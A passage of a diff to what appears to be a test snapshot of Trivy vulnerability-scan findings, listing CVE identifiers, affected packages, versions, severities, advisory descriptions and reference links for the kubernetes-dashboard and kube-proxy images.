"https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://ubuntu.com/security/notices/USN-5707-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-1000654", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", + "http://www.securityfocus.com/bid/105151", + "https://access.redhat.com/security/cve/CVE-2018-1000654", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "https://gitlab.com/gnutls/libtasn1/issues/4", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "https://ubuntu.com/security/notices/USN-5352-1", + "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + ], + }, + "category": "Vulnerability", + "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "http://www.securityfocus.com/bid/105151", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://gitlab.com/gnutls/libtasn1/issues/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://ubuntu.com/security/notices/USN-5352-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "http://www.securityfocus.com/bid/108116", + "https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "http://www.securityfocus.com/bid/108096", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", ], }, "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "request smuggling", + "name": "privilege escalation via the less pager", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 